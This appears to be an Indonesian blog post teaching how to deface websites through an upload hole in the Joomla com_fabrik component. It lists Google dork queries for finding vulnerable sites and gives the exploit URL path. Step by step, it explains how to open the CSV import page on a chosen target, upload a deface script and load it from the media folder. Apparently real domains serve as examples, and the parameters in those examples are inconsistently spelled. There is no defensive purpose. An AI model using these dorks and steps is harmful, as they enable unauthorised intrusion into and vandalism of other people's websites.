Deface Metode Poc Com Fabrik
Alat dan bahan:
1.Script Deface.
2.kesabaran.
Dork :
inurl:index.php?option=com_fabrik
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
inurl:viewTable?cid= site:com
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
1. Dorking digoogle dan pilih Web Yg vuln
2. Pilih target lalu copy EXPLOIT nya yg udah gua sedain paste dibelakang url
Contoh : http://target.co.li/exploitnya
Misal http://www.autosport.eu..lalu tambahkan exploitnya index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Jadi http://www.autotrasportict.eu/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
3. kalau web nya vuln maka ada halaman untuk upload/import csv nya :
Catatan : setiap website tampilan nya berbeda
4.Lalu Upload Script mu
5.Panggil Scriptmu dengan perintah exploit media/nama scriptmu.html
Contoh: http://www.autotrasportict.eu/media/revolution.html
Live Targer:
Komentar
Posting Komentar